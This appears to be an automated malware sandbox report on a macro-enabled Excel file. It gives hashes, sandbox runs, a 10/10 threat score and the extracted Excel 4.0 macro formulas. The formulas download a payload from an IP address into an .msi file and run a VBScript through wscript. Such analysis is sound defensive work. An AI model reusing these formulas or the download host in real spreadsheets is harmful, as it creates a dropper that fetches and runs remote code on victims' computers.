General
-
Target
304c34f71a139a5915827427d257160e
-
Size
6KB
-
Sample
231222-adzdksdgam
-
MD5
304c34f71a139a5915827427d257160e
-
SHA1
7f70e00be516eac0e20dce5590b2a44682d3b504
-
SHA256
bb47aa8044fde53ad4eb7843b60055097f844b03a57469802363d6733d195ac1
-
SHA512
059c9884e109b0462025f38830cdfac8b6ab9b3e2334d2efe885d53627e9abe17fdc8a10184d3e3cce949604633b6ab2a4a7471982c2dd9b11d750b515d05e18
-
SSDEEP
192:NDS7uSpbrA2OmmfRk8UhHFBFYuyb98yVV+y:NsuGM2w+1FYDb98yVX
Static task
static1
Behavioral task
behavioral1
Sample
304c34f71a139a5915827427d257160e.xlsm
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
304c34f71a139a5915827427d257160e.xlsm
Resource
win10v2004-20231215-en
Malware Config
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
-
formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0)
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0)
=EXEC("wscript C:\zer\spp.vbs")
=HALT()
Targets
Score
10/10
-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-
Process spawned suspicious child process
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
-